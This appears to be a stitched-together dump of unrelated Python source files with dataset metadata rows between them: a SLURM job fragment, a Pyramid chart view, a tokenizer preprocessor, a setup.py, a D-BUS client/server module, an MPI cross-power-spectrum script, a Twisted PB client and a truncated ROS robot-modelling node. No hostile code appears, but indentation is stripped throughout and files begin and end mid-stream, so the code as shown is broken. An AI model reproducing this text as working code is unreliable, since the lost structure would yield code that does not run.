taskCount = int(os.getenv('SLURM_ARRAY_TASK_COUNT'))
taskID = int(os.getenv('SLURM_ARRAY_TASK_ID'))
if(taskCount > len(Params_List)):
print('ERROR: TASK COUNT MISMATCH')
P = float('nan')
aIBi = float('nan')
sys.exit()
else:
[sParams, cParams, innerdatapath] = Params_List[taskID]
[mI, mB, n0, gBB] = sParams
[P, aIBi] = cParams
dyncart_ds = pf_dynamic_cart.quenchDynamics_DataGeneration(cParams, gParams, sParams, toggleDict)
dyncart_ds.to_netcdf(innerdatapath + '/P_{:.3f}_aIBi_{:.2f}.nc'.format(P, aIBi))
end = timer()
print('Task ID: {:d}, P: {:.2f}, aIBi: {:.2f} Time: {:.2f}'.format(taskID, P, aIBi, end - runstart))
| mit | 4,372,049,834,979,202,600 | 40.615385 | 173 | 0.545571 | false | 2.731262 | false | false | false |
lightbase/WSCacicNeo | wscacicneo/views/graficos.py | 1 | 6987 | __author__ = 'adley'
import requests
import json
import random
from wscacicneo.utils.utils import Utils
from pyramid.httpexceptions import HTTPFound
from wscacicneo.model import config_reports
from liblightbase.lbsearch.search import NullDocument
from pyramid.session import check_csrf_token
from wscacicneo.search.orgao import SearchOrgao
class Graficos():
def __init__(self, request):
"""
Método construtor
:param request: Requisição
"""
self.request = request
self.usuario_autenticado = Utils.retorna_usuario_autenticado(
self.request.session.get('userid'))
def graficos_orgao(self):
if 'attr' in self.request.matchdict.keys():
attr = self.request.matchdict['attr']
else:
attr = 'softwarelist'
orgao = self.request.matchdict['nm_orgao']
data = dict()
if orgao != 'todos-orgaos':
if attr not in ['softwarelist','todos']:
return self.graficos(orgao = orgao)
elif attr == 'todos':
for attrib in ['win32_physicalmemory', 'win32_bios', 'win32_diskdrive', 'operatingsystem', 'win32_processor']:
data[attrib] = self.graficos(attr=attrib)['data']
data['softwarelist'] = self.graficos_software(view_type='detailed')['data']
else:
return self.graficos_software(orgao)
else:
search = SearchOrgao()
orgaos = [org.nome for org in search.list_by_name()]
for org in orgaos:
if attr != 'softwarelist':
data[org] = self.graficos(orgao = org)['data']
else:
data[org] = self.graficos_software(org)['data']
title_chart = ''
# Define o nome do gráfico baseado no "attr"
if attr == "win32_processor":
title_chart = "Gráfico de Processadores"
elif attr == "win32_diskdrive":
title_chart = "Gráfico de HD"
elif attr == "win32_bios":
title_chart = "Gráfico de BIOS"
elif attr == "win32_physicalmemory":
title_chart = "Gráfico de Memória"
elif attr == "operatingsystem":
title_chart = "Gráfico de Sistemas Operacionais"
elif attr == "softwarelist":
title_chart = "Gráfico de Softwares"
elif attr != 'todos':
title_chart = "Gráfico de "+attr
return {"data": data,
"usuario_autenticado": self.usuario_autenticado,
"title_chart": title_chart,
"orgao_nm": orgao,
"attr": attr
}
def graficos(self, orgao=None, attr=None):
# Define o nome do gráfico baseado no "attr"
if attr is None:
attr = self.request.matchdict['attr']
if attr == "win32_processor":
title_chart = "Gráfico de Processadores"
elif attr == "win32_diskdrive":
title_chart = "Gráfico de HD"
elif attr == "win32_bios":
title_chart = "Gráfico de BIOS"
elif attr == "win32_physicalmemory":
title_chart = "Gráfico de Memória"
elif attr == "operatingsystem":
title_chart = "Gráfico de Sistemas Operacionais"
else:
title_chart = "Gráfico de "+attr
if orgao is None:
orgao_nm = self.request.matchdict['nm_orgao']
else:
orgao_nm = orgao
nm_orgao = Utils.format_name(orgao_nm)
reports_config = config_reports.ConfReports(nm_orgao)
get_base = reports_config.get_attribute(attr)
results = get_base.results
data = []
list_of_numbers = []
data.append(['Item', 'Quantidade'])
# color_list = ["#8B0000", "#191970", "#2F4F4F", "#006400", "#808000",
# "#696969", "#B8860B", "#FF8C00", "#2E8B57", "#228B22"]
# chosen_color = 0
for elm in results:
if isinstance(elm, NullDocument):
continue
parent = getattr(elm, attr)
item = getattr(parent, attr + '_item')
amount = getattr(parent, attr + '_amount')
data.append([item, int(amount)])
list_of_numbers.append([int(amount)])
# Antigo código para o Charts JS
# data.append({"label": item, "data": int(amount), "color": color_list[chosen_color]})
# chosen_color += 1
# if chosen_color >= len(color_list):
# chosen_color = 0
# if attr == "software":
# max_num = Utils.getMaxOfList(list_of_numbers)
return {"data": data,
"usuario_autenticado": self.usuario_autenticado,
"title_chart": title_chart,
"orgao_nm": orgao_nm,
"attr": attr
}
def graficos_software(self, orgao=None, view_type = None):
attr = 'softwarelist'
title_chart = "Gráfico de Softwares"
if view_type is None:
view_type = self.request.matchdict['view_type']
if orgao is None:
orgao_nm = self.request.matchdict['nm_orgao']
else:
orgao_nm = orgao
nm_orgao = Utils.format_name(orgao_nm)
reports_config = config_reports.ConfReports(nm_orgao)
get_base = reports_config.get_attribute(attr)
results = get_base.results
data = []
list_of_numbers = []
data.append(['Item', 'Quantidade'])
# color_list = ["#8B0000", "#191970", "#2F4F4F", "#006400", "#808000",
# "#696969", "#B8860B", "#FF8C00", "#2E8B57", "#228B22"]
# chosen_color = 0
for elm in results:
if isinstance(elm, NullDocument):
continue
parent = getattr(elm, attr)
item = getattr(parent, attr + '_item')
amount = getattr(parent, attr + '_amount')
data.append([item, int(amount)])
list_of_numbers.append([int(amount)])
# Antigo código para o Charts JS
# data.append({"label": item, "data": int(amount), "color": color_list[chosen_color]})
# chosen_color += 1
# if chosen_color >= len(color_list):
# chosen_color = 0
if view_type == 'simple':
data_dict = dict()
data.pop(0)
for a in data:
data_dict[a[0]]= a[1]
data_dict = Utils.group_data(data_dict)
data=list()
data.append(['Item', 'Quantidade'])
for a in data_dict.keys():
data.append([a, int(data_dict[a])])
#if attr == "software":
#max_num = Utils.getMaxOfList(list_of_numbers)
return {"data": data,
"usuario_autenticado": self.usuario_autenticado,
"title_chart": title_chart,
"orgao_nm": orgao_nm,
"attr": attr
} | gpl-2.0 | 6,287,621,518,878,857,000 | 36.853261 | 126 | 0.536617 | false | 3.573114 | true | false | false |
CodeLionX/CommentSearchEngine | cse/lang/Preprocessor.py | 1 | 1532 | class Preprocessor(object):
__tokenizer = None
__steps = []
def __init__(self, tokenizer, steps):
self.__tokenizer = tokenizer
self.__steps = steps
def processText(self, comment):
tokens = self.__tokenizer.tokenize(comment)
tokenTuple = [(token, position) for position, token in enumerate(tokens)]
###### which way is faster?
for step in self.__steps:
tokenTuple = step.processAll(tokenTuple)
######
"""
pTokenTuple = []
for token, position in tokenTuple:
pT = (token, position)
for step in self.__steps:
pT = step.process(pT)
if pT: pTokenTuple.append(pT)
tokenTuple = pTokenTuple
"""
###### which way is faster?
## doesn't make a huge difference:
"""
ncalls tottime percall cumtime percall filename:lineno(function)
first one:
81098 0.342 0.000 114.429 0.001 /vagrant/cse/lang/Preprocessor.py:12(processText)
81098 0.057 0.000 65.668 0.001 /vagrant/cse/lang/NltkStemmer.py:22(processAll)
compared to second one:
81098 2.708 0.000 119.330 0.001 /vagrant/cse/lang/Preprocessor.py:12(processText)
2955756 1.275 0.000 67.069 0.000 /vagrant/cse/lang/NltkStemmer.py:26(process)
--> only about 5 seconds difference in cumulative execution time for 81098 calls
"""
return tokenTuple
| mit | 4,829,856,591,023,380,000 | 34.627907 | 102 | 0.567885 | false | 3.709443 | false | false | false |
messense/stacktracer | setup.py | 1 | 1227 | #!/usr/bin/env python
from __future__ import with_statement
import os
from setuptools import setup
readme = 'README.md'
if os.path.exists('README.rst'):
readme = 'README.rst'
with open(readme) as f:
long_description = f.read()
setup(
name='stacktracer',
version='0.1.2',
author='messense',
author_email='messense@icloud.com',
url='https://github.com/messense/stacktracer',
keywords='stack, tracer, multi-threaded, threading',
description='Stack tracer for multi-threaded applications',
long_description=long_description,
py_modules=['stacktracer'],
install_requires=[
'pygments',
],
include_package_data=True,
classifiers=[
'Development Status :: 4 - Beta',
'License :: OSI Approved :: MIT License',
'Operating System :: MacOS',
'Operating System :: POSIX',
'Operating System :: POSIX :: Linux',
'Programming Language :: Python',
'Programming Language :: Python :: Implementation :: CPython',
'Intended Audience :: Developers',
'Topic :: Software Development :: Libraries',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Utilities',
],
)
| mit | 9,144,691,725,418,073,000 | 30.461538 | 71 | 0.632437 | false | 4.216495 | false | false | false |
geertj/gruvi | lib/gruvi/dbus.py | 2 | 21739 | #
# This file is part of Gruvi. Gruvi is free software available under the
# terms of the MIT license. See the file "LICENSE" that was provided
# together with this source file for the licensing terms.
#
# Copyright (c) 2012-2017 the Gruvi authors. See the file "AUTHORS" for a
# complete list.
"""
The :mod:`gruvi.dbus` module implements a D-BUS client and server.
The implementation uses parts of the `txdbus
<https://github.com/cocagne/txdbus>`_ project. A cut down copy of txdbus,
containing only those parts needed by Gruvi, is available as ``gruvi.txdbus``.
You need this if you are providing a message handler (see below).
Both a client and a server/bus-side implementation are provided. The bus-side
implementation is very bare bones and apart from the "Hello" message it does
not implement any of the "org.freedestkop.DBus" interface. It also does not
implement any message routing. The server side is provided mostly for testing
purposes (but it could serve as the basis for a real D-BUS server).
The client side of a D-BUS connection is implemented by :class:`DbusClient` and
the server/bus-side by :class:`DbusServer`. Both implement a procedural
interface. Messages can be send using e.g. :meth:`DbusClient.send_message` or
:meth:`DbusClient.call_method`. An object-oriented interface that represents
D-BUS objects as Python objects, like the one txdbus provides, is currently not
available. The procedural interface can be used as a basis for your own
object-oriented interface though.
To receive notifications or to respond to method calls, you need to provide a
*message handler* to the client or the server constructor. The signature of the
message handler is: ``message_handler(message, protocol)``. Here, the *message*
argument is an instance of ``gruvi.txdbus.DbusMessages``, and the
*protocol* will be the :class:`DbusProtocol` instance for the current
connection.
Message handlers runs in their own fiber, which allows them to call into
switchpoints. There is one fiber for every connection.
Usage example::
client = gruvi.DbusClient()
client.connect('session')
result = client.call_method('org.freedesktop.DBus', '/org/freedesktop/DBus',
'org.freedesktop.DBus', 'ListNames')
for name in result[0]:
print('Name: {}'.format(name))
"""
from __future__ import absolute_import, print_function
import os
import struct
import binascii
import codecs
import functools
import six
import pyuv
from . import compat
from .hub import switchpoint, switch_back
from .util import delegate_method
from .sync import Event
from .transports import TransportError
from .protocols import ProtocolError, MessageProtocol
from .stream import Stream
from .endpoints import Client, Server
from .address import saddr
from .vendor import txdbus
__all__ = ['DbusError', 'DbusMethodCallError', 'DbusProtocol', 'DbusClient', 'DbusServer']
class DbusError(ProtocolError):
"""Exception that is raised in case of D-BUS protocol errors."""
class DbusMethodCallError(DbusError):
"""Exception that is raised when a error reply is received for a D-BUS
method call."""
def __init__(self, method, reply):
message = 'error calling {!r} method ({})'.format(method, reply.error_name)
super(DbusMethodCallError, self).__init__(message)
self._error = reply.error_name
self._args = tuple(reply.body) if reply.body else ()
@property
def error(self):
return self._error
@property
def args(self):
return self._args
def parse_dbus_address(address):
"""Parse a D-BUS address string into a list of addresses."""
if address == 'session':
address = os.environ.get('DBUS_SESSION_BUS_ADDRESS')
if not address:
raise ValueError('$DBUS_SESSION_BUS_ADDRESS not set')
elif address == 'system':
address = os.environ.get('DBUS_SYSTEM_BUS_ADDRESS',
'unix:path=/var/run/dbus/system_bus_socket')
addresses = []
for addr in address.split(';'):
p1 = addr.find(':')
if p1 == -1:
raise ValueError('illegal address string: {}'.format(addr))
kind = addr[:p1]
args = dict((kv.split('=') for kv in addr[p1+1:].split(',')))
if kind == 'unix':
if 'path' in args:
addr = args['path']
elif 'abstract' in args:
addr = '\0' + args['abstract']
else:
raise ValueError('require "path" or "abstract" for unix')
elif kind == 'tcp':
if 'host' not in args or 'port' not in args:
raise ValueError('require "host" and "port" for tcp')
addr = (args['host'], int(args['port']))
else:
raise ValueError('unknown transport: {}'.format(kind))
addresses.append(addr)
return addresses
class TxdbusAuthenticator(object):
"""A adapter to use the txdbus client and server authenticators with our
transports and protocols."""
# For testing, cookie_dir is set to a temporary path. Otherwise, txdbus
# uses ~/.dbus-keyrings as specified in the spec.
cookie_dir = None
def __init__(self, transport, server_side, server_guid=None):
self._transport = transport
self._server_side = server_side
if self._server_side:
self._authenticator = txdbus.BusAuthenticator(server_guid)
self._authenticator.authenticators['DBUS_COOKIE_SHA1'].keyring_dir = self.cookie_dir
else:
self._authenticator = txdbus.ClientAuthenticator()
self._authenticator.cookie_dir = self.cookie_dir
self._authenticator.beginAuthentication(self)
def sendAuthMessage(self, message):
# Called by the txdbus authenticators
message = message.encode('ascii') + b'\r\n'
self._transport.write(message)
@property
def _unix_creds(self):
# Used by txdbus.BusExternalAuthenticator
return self._transport.get_extra_info('unix_creds')
def handleAuthMessage(self, line):
# Called by our protocol
self._authenticator.handleAuthMessage(line)
def authenticationSucceeded(self):
"""Return whether the authentication succeeded."""
return self._authenticator.authenticationSucceeded()
def getMechanismName(self):
"""Return the authentication mechanism name."""
if self._server_side:
mech = self._authenticator.current_mech
return mech.getMechanismName() if mech else None
else:
return getattr(self._authenticator, 'authMech', None)
def getUserName(self):
"""Return the authenticated user name (server side)."""
if not self._server_side:
return
mech = self._authenticator.current_mech
return mech.getUserName() if mech else None
def getGUID(self):
"""Return the GUID of the authenticated server."""
return self._authenticator.getGUID()
def parse_dbus_header(header):
"""Parse a D-BUS header. Return the message size."""
if six.indexbytes(header, 0) == ord('l'):
endian = '<'
elif six.indexbytes(header, 0) == ord('B'):
endian = '>'
else:
raise ValueError('illegal endianness')
if not 1 <= six.indexbytes(header, 1) <= 4:
raise ValueError('illegel message type')
if struct.unpack(endian + 'I', header[8:12])[0] == 0:
raise ValueError('illegal serial number')
harrlen = struct.unpack(endian + 'I', header[12:16])[0]
padlen = (8 - harrlen) % 8
bodylen = struct.unpack(endian + 'I', header[4:8])[0]
return 16 + harrlen + padlen + bodylen
def new_server_guid():
"""Return a new GUID for a server."""
return binascii.hexlify(os.urandom(16)).decode('ascii')
class DbusProtocol(MessageProtocol):
"""D-BUS Protocol."""
# According to the D-BUS spec the max message size is 128MB. However since
# we want to limited memory usage we are much more conservative here.
max_message_size = 128*1024
# Maximum size for an authentication line
max_line_size = 1000
_next_unique_name = 0
S_CREDS_BYTE, S_AUTHENTICATE, S_MESSAGE_HEADER, S_MESSAGE = range(4)
def __init__(self, message_handler=None, server_side=False, server_guid=None, timeout=None):
super(DbusProtocol, self).__init__(message_handler, timeout=timeout)
self._server_side = server_side
self._name_acquired = Event()
self._buffer = bytearray()
self._method_calls = {}
self._authenticator = None
if self._server_side:
self._server_guid = server_guid or new_server_guid()
self._unique_name = ':{}'.format(self._next_unique_name)
type(self)._next_unique_name += 1
else:
self._server_guid = None
self._unique_name = None
self._state = None
@property
def server_guid(self):
return self._server_guid
def connection_made(self, transport):
# Protocol callback
super(DbusProtocol, self).connection_made(transport)
# The client initiates by sending a '\0' byte, as per the D-BUS spec.
if self._server_side:
self._state = self.S_CREDS_BYTE
else:
self._state = self.S_AUTHENTICATE
self._transport.write(b'\0')
self._writer = Stream(transport, 'w')
self._authenticator = TxdbusAuthenticator(transport, self._server_side, self._server_guid)
self._message_size = 0
def connection_lost(self, exc):
# Protocol callback
super(DbusProtocol, self).connection_lost(exc)
if self._error is None:
self._error = TransportError('connection lost')
for notify in self._method_calls.values():
if isinstance(notify, switch_back):
notify.throw(self._error)
self._method_calls.clear()
self._name_acquired.set()
self._authenticator = None # break cycle
def on_creds_byte(self, byte):
if byte != 0:
self._error = DbusError('first byte needs to be zero')
return False
self._state = self.S_AUTHENTICATE
return True
def on_partial_auth_line(self, line):
if len(line) > self.max_line_size:
self._error = DbusError('auth line too long ({} bytes)'.format(len(line)))
return False
return True
def on_auth_line(self, line):
if not self.on_partial_auth_line(line):
return False
if line[-2:] != b'\r\n':
self._error = DbusError('auth line does not end with \\r\\n')
return False
try:
line = codecs.decode(line[:-2], 'ascii') # codecs.decode allows memoryview
except UnicodeDecodeError as e:
self._error = DbusError('auth line contain non-ascii chars')
return False
try:
self._authenticator.handleAuthMessage(line)
except txdbus.DBusAuthenticationFailed as e:
self._error = DbusError('authentication failed: {!s}'.format(e))
return False
if self._authenticator.authenticationSucceeded():
if not self._server_side:
message = txdbus.MethodCallMessage('/org/freedesktop/DBus', 'Hello',
'org.freedesktop.DBus', 'org.freedesktop.DBus')
self._transport.write(message.rawMessage)
self._method_calls[message.serial] = self.on_hello_response
self._state = self.S_MESSAGE_HEADER
self._server_guid = self._authenticator.getGUID()
return True
def on_hello_response(self, message):
self._unique_name = message.body[0]
self._name_acquired.set()
def on_message_header(self, header):
try:
size = parse_dbus_header(header)
except ValueError:
self._error = DbusError('invalid message header')
return False
if size > self.max_message_size:
self._error = DbusError('message too large ({} bytes)'.format(size))
return False
self._message_size = size
self._state = self.S_MESSAGE
return True
def on_message(self, message):
try:
parsed = txdbus.parseMessage(message)
except (txdbus.MarshallingError, struct.error) as e:
self._error = DbusError('parseMessage() error: {!s}'.format(e))
return False
if self._server_side and not self._name_acquired.is_set():
if isinstance(parsed, txdbus.MethodCallMessage) \
and parsed.member == 'Hello' \
and parsed.path == '/org/freedesktop/DBus' \
and parsed.interface == 'org.freedesktop.DBus' \
and parsed.destination == 'org.freedesktop.DBus':
response = txdbus.MethodReturnMessage(parsed.serial, signature='s',
body=[self._unique_name])
self._name_acquired.set()
self._transport.write(response.rawMessage)
else:
self._error = DbusError('Hello method not called')
return False
elif isinstance(parsed, (txdbus.MethodReturnMessage, txdbus.ErrorMessage)) \
and getattr(parsed, 'reply_serial', 0) in self._method_calls:
notify = self._method_calls.pop(parsed.reply_serial)
notify(parsed)
elif self._dispatcher:
self._queue.put_nowait(parsed)
else:
mtype = type(parsed).__name__[:-7].lower()
info = ' {!r}'.format(getattr(parsed, 'member', getattr(parsed, 'error_name', '')))
self._log.warning('no handler, ignoring inbound {}{}', mtype, info)
self._state = self.S_MESSAGE_HEADER
return True
def prepend_buffer(self, buf):
if self._buffer:
self._buffer.extend(buf)
buf = self._buffer
self._buffer = bytearray()
return memoryview(buf)
def data_received(self, data):
view = memoryview(data)
offset = 0
while offset != len(data):
if self._state == self.S_CREDS_BYTE:
credsbyte = six.indexbytes(view, offset)
offset += 1
if not self.on_creds_byte(credsbyte):
break
if self._state == self.S_AUTHENTICATE:
pos = data.find(b'\n', offset)
if pos == -1:
self._buffer.extend(view[offset:])
self.on_partial_auth_line(self._buffer)
break
line = self.prepend_buffer(view[offset:pos+1])
offset = pos+1
if not self.on_auth_line(line):
break
if self._state == self.S_MESSAGE_HEADER:
needbytes = 16 - len(self._buffer)
if len(data) - offset < needbytes:
self._buffer.extend(view[offset:])
break
header = self.prepend_buffer(view[offset:offset+needbytes])
if not self.on_message_header(header):
break
offset += len(header)
self._buffer.extend(header)
if self._state == self.S_MESSAGE:
needbytes = self._message_size - len(self._buffer)
if len(data) - offset < needbytes:
self._buffer.extend(view[offset:])
break
message = self.prepend_buffer(view[offset:offset+needbytes])
offset += needbytes
if not self.on_message(message):
break
self._maybe_pause_transport()
if self._error:
self._transport.close()
return
@switchpoint
def get_unique_name(self):
"""Return the unique name of the D-BUS connection."""
self._name_acquired.wait()
if self._error:
raise compat.saved_exc(self._error)
elif self._transport is None:
raise DbusError('not connected')
return self._unique_name
@switchpoint
def send_message(self, message):
"""Send a D-BUS message.
The *message* argument must be ``gruvi.txdbus.DbusMessage`` instance.
"""
if not isinstance(message, txdbus.DbusMessage):
raise TypeError('message: expecting DbusMessage instance (got {!r})',
type(message).__name__)
self._name_acquired.wait()
if self._error:
raise compat.saved_exc(self._error)
elif self._transport is None:
raise DbusError('not connected')
self._writer.write(message.rawMessage)
@switchpoint
def call_method(self, service, path, interface, method, signature=None,
args=None, no_reply=False, auto_start=False, timeout=-1):
"""Call a D-BUS method and wait for its reply.
This method calls the D-BUS method with name *method* that resides on
the object at bus address *service*, at path *path*, on interface
*interface*.
The *signature* and *args* are optional arguments that can be used to
add parameters to the method call. The signature is a D-BUS signature
string, while *args* must be a sequence of python types that can be
converted into the types specified by the signature. See the `D-BUS
specification
<http://dbus.freedesktop.org/doc/dbus-specification.html>`_ for a
reference on signature strings.
The flags *no_reply* and *auto_start* control the NO_REPLY_EXPECTED and
NO_AUTO_START flags on the D-BUS message.
The return value is the result of the D-BUS method call. This will be a
possibly empty sequence of values.
"""
message = txdbus.MethodCallMessage(path, method, interface=interface,
destination=service, signature=signature, body=args,
expectReply=not no_reply, autoStart=auto_start)
serial = message.serial
if timeout == -1:
timeout = self._timeout
try:
with switch_back(timeout) as switcher:
self._method_calls[serial] = switcher
self.send_message(message)
args, _ = self._hub.switch()
finally:
self._method_calls.pop(serial, None)
response = args[0]
assert response.reply_serial == serial
if isinstance(response, txdbus.ErrorMessage):
raise DbusMethodCallError(method, response)
args = tuple(response.body) if response.body else ()
return args
class DbusClient(Client):
"""A D-BUS client."""
def __init__(self, message_handler=None, timeout=30):
"""
The *message_handler* argument specifies an optional message handler.
The optional *timeout* argument specifies a default timeout for
protocol operations in seconds.
"""
protocol_factory = functools.partial(DbusProtocol, message_handler)
super(DbusClient, self).__init__(protocol_factory, timeout)
@switchpoint
def connect(self, address='session'):
"""Connect to *address* and wait until the connection is established.
The *address* argument must be a D-BUS server address, in the format
described in the D-BUS specification. It may also be one of the special
addresses ``'session'`` or ``'system'``, to connect to the D-BUS
session and system bus, respectively.
"""
if isinstance(address, six.string_types):
addresses = parse_dbus_address(address)
else:
addresses = [address]
for addr in addresses:
try:
super(DbusClient, self).connect(addr)
except pyuv.error.UVError:
continue
break
else:
raise DbusError('could not connect to any address')
# Wait for authentication to complete
self.get_unique_name()
protocol = Client.protocol
delegate_method(protocol, DbusProtocol.get_unique_name)
delegate_method(protocol, DbusProtocol.send_message)
delegate_method(protocol, DbusProtocol.call_method)
class DbusServer(Server):
"""A D-BUS server."""
def __init__(self, message_handler, timeout=30):
"""
The *message_handler* argument specifies the message handler.
The optional *timeout* argument specifies a default timeout for
protocol operations in seconds.
"""
protocol_factory = functools.partial(DbusProtocol, message_handler,
server_side=True)
super(DbusServer, self).__init__(protocol_factory, timeout)
@switchpoint
def listen(self, address='session'):
"""Start listening on *address* for new connection.
The *address* argument must be a D-BUS server address, in the format
described in the D-BUS specification. It may also be one of the special
addresses ``'session'`` or ``'system'``, to connect to the D-BUS
session and system bus, respectively.
"""
if isinstance(address, six.string_types):
addresses = parse_dbus_address(address)
else:
addresses = [address]
for addr in addresses:
try:
super(DbusServer, self).listen(addr)
except pyuv.error.UVError:
self._log.error('skipping address {}', saddr(addr))
| mit | -2,074,246,292,200,640,500 | 38.311031 | 98 | 0.609596 | false | 4.191863 | false | false | false |
rainwoodman/nbodykit | legacy/measurepower-mm.py | 3 | 3829 | from sys import argv
from sys import stdout
from sys import stderr
import logging
from argparse import ArgumentParser
parser = ArgumentParser("Parallel Cross Power Spectrum Calculator",
description=
"""Calculating cross matter power spectrum from two RunPB input files.
Output is written to stdout, in Mpc/h units.
PowerSpectrum is the true one, without (2 pi) ** 3 factor. (differ from Gadget/NGenIC internal)
""",
epilog=
"""
This script is written by Yu Feng, as part of `nbodykit'.
The author would like thank Marcel Schmittfull for the explanation on cic, shotnoise, and k==0 plane errors.
"""
)
parser.add_argument("filename1",
help='basename of the input, only runpb format is supported in this script')
parser.add_argument("filename2",
help='basename of the input, only runpb format is supported in this script')
parser.add_argument("BoxSize", type=float,
help='BoxSize in Mpc/h')
parser.add_argument("Nmesh", type=int,
help='size of calculation mesh, recommend 2 * Ngrid')
parser.add_argument("output", help='write power to this file')
parser.add_argument("--binshift", type=float, default=0.0,
help='Shift the bin center by this fraction of the bin width. Default is 0.0. Marcel uses 0.5. this shall rarely be changed.' )
parser.add_argument("--bunchsize", type=int, default=1024*1024*4,
help='Number of particles to read per rank. A larger number usually means faster IO, but less memory for the FFT mesh')
parser.add_argument("--remove-cic", default='anisotropic', choices=["anisotropic","isotropic", "none"],
help='deconvolve cic, anisotropic is the proper way, see http://www.personal.psu.edu/duj13/dissertation/djeong_diss.pdf')
ns = parser.parse_args()
logging.basicConfig(level=logging.DEBUG)
import numpy
import nbodykit
from nbodykit.files import TPMSnapshotFile, read
from nbodykit.measurepower import measurepower
from pypm.particlemesh import ParticleMesh
from pypm.transfer import TransferFunction
from mpi4py import MPI
def paint_darkmatter(pm, filename, fileformat):
pm.real[:] = 0
Ntot = 0
for round, P in enumerate(read(pm.comm, filename, TPMSnapshotFile,
columns=['Position'], bunchsize=ns.bunchsize)):
P['Position'] *= ns.BoxSize
layout = pm.decompose(P['Position'])
tpos = layout.exchange(P['Position'])
#print tpos.shape
pm.paint(tpos)
npaint = pm.comm.allreduce(len(tpos), op=MPI.SUM)
nread = pm.comm.allreduce(len(P['Position']), op=MPI.SUM)
if pm.comm.rank == 0:
logging.info('round %d, npaint %d, nread %d' % (round, npaint, nread))
Ntot = Ntot + nread
return Ntot
def main():
if MPI.COMM_WORLD.rank == 0:
print 'importing done'
pm = ParticleMesh(ns.BoxSize, ns.Nmesh, dtype='f4')
Ntot = paint_darkmatter(pm, ns.filename1, TPMSnapshotFile)
if MPI.COMM_WORLD.rank == 0:
print 'painting done'
pm.r2c()
if MPI.COMM_WORLD.rank == 0:
print 'r2c done'
complex = pm.complex.copy()
numpy.conjugate(complex, out=complex)
Ntot = paint_darkmatter(pm, ns.filename2, TPMSnapshotFile)
if MPI.COMM_WORLD.rank == 0:
print 'painting 2 done'
pm.r2c()
if MPI.COMM_WORLD.rank == 0:
print 'r2c 2 done'
complex *= pm.complex
complex **= 0.5
if MPI.COMM_WORLD.rank == 0:
print 'cross done'
k, p = measurepower(pm, complex, ns.binshift, ns.remove_cic, 0)
if MPI.COMM_WORLD.rank == 0:
print 'measure'
if pm.comm.rank == 0:
if ns.output != '-':
myout = open(ns.output, 'w')
else:
myout = stdout
numpy.savetxt(myout, zip(k, p), '%0.7g')
myout.flush()
main()
| gpl-3.0 | 4,916,736,200,148,130,000 | 33.495495 | 135 | 0.653957 | false | 3.431004 | false | false | false |
tzewangdorje/SIPserv | Twisted-13.1.0/doc/core/howto/listings/pb/pb4client.py | 18 | 1794 | #!/usr/bin/env python
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
from twisted.spread import pb
from twisted.internet import reactor
def main():
rootobj_def = pb.getObjectAt("localhost", 8800, 30)
rootobj_def.addCallbacks(got_rootobj)
obj2_def = getSomeObjectAt("localhost", 8800, 30, "two")
obj2_def.addCallbacks(got_obj2)
obj3_def = getSomeObjectAt("localhost", 8800, 30, "three")
obj3_def.addCallbacks(got_obj3)
reactor.run()
def got_rootobj(rootobj):
print "got root object:", rootobj
print "telling root object to do foo(A)"
rootobj.callRemote("foo", "A")
def got_obj2(obj2):
print "got second object:", obj2
print "telling second object to do foo(B)"
obj2.callRemote("foo", "B")
def got_obj3(obj3):
print "got third object:", obj3
print "telling third object to do foo(C)"
obj3.callRemote("foo", "C")
class my_ObjectRetrieval(pb._ObjectRetrieval):
def __init__(self, broker, d, objname):
pb._ObjectRetrieval.__init__(self, broker, d)
self.objname = objname
def connectionMade(self):
assert not self.term, "How did this get called?"
x = self.broker.remoteForName(self.objname)
del self.broker
self.term = 1
self.deferred.callback(x)
def getSomeObjectAt(host, port, timeout=None, objname="root"):
from twisted.internet import defer
from twisted.spread.pb import Broker, BrokerClientFactory
d = defer.Deferred()
b = Broker(1)
bf = BrokerClientFactory(b)
my_ObjectRetrieval(b, d, objname)
if host == "unix":
# every time you use this, God kills a kitten
reactor.connectUNIX(port, bf, timeout)
else:
reactor.connectTCP(host, port, bf, timeout)
return d
main()
| gpl-3.0 | -4,227,292,638,903,783,400 | 29.931034 | 62 | 0.662765 | false | 3.340782 | false | false | false |
alexis-jacq/Mutual_Modelling | nodes/cowriter_mutual_modelling.py | 1 | 5953 | #!/usr/bin/env python
#coding: utf-8
import sys
import time
import rospy
import json
from std_msgs.msg import String, Empty, Float64
from mutualModelling.agent2 import Agent
# this node udate models of agents (by the robot) and publishes the choice of action by the robot:
#-------------------------------------------------------------------------------------------------
pub_robot_action = rospy.Publisher('robot_action_topic', String, queue_size=1)
# create a mutual modeller agent "robot" that also model an agent "human" in cowriter:
#-------------------------------------------------------------------------------------
ROBOT_NAME = "Mimi"
HUMAN_NAME = "Child"
ALL_NAMES = [ROBOT_NAME, HUMAN_NAME]
robot_percepts = ["child_progress","reward","punish","justified_reward","justified_punish","justified_new_word","with_me"]
robot_actions = ["converges","diverges","exaggerates","looks_tablet","looks_child_head","looks_out","looks_experimentator","looks_selection_tablet","points_tablet"]
robot_rewards = [["justified_reward",1.,1.],["justified_punish",1.,1],["with_me",1.,1.],["with_me",-1.,-1.],["child_progress",1.,1.],["justified_new_word",1.,1.]]
#robot_instincts = [[HUMAN_NAME+"_looks_robot_head",1.,"looks_child_head"],[HUMAN_NAME+"_looks_robot_head",1.,"looks_tablet"], [HUMAN_NAME+"_looks_tablet",1.,"looks_child_head"],[HUMAN_NAME+"_looks_tablet",1.,"looks_tablet"], [HUMAN_NAME+"_looks_noise",1.,"looks_child_head"],[HUMAN_NAME+"_looks_noise",1.,"mimics"], [HUMAN_NAME+"_looks_selection_tablet",1.,"looks_selection_tablet"], [HUMAN_NAME+"_looks_experimentator",1.,"looks_experimentator"]]
#robot = Agent(ROBOT_NAME,ALL_NAMES,robot_percepts,robot_actions,robot_rewards,robot_instincts)
robot = Agent(ROBOT_NAME,ALL_NAMES,robot_percepts,robot_actions,robot_rewards)
# the point of attention of the human is used to define what action of the robot is observed by the child:
#---------------------------------------------------------------------------------------------------------
objects = {"experimentator","selection_tablet","tablet","robot_head","out"}
human_attention = ""
# what the human can perceive about robot actions given his point of attention:
visible_for_human_from = {"tablet":["converges","diverges"], "robot_head":["looks_tablet","looks_child_head","looks_out","points_tablet","looks_experimentator"]}
# what the robot is expected to perceive about human action given robot's attention:
# (the robot is not expected (by the child) to differentiate justified/unjustified behavior of the child)
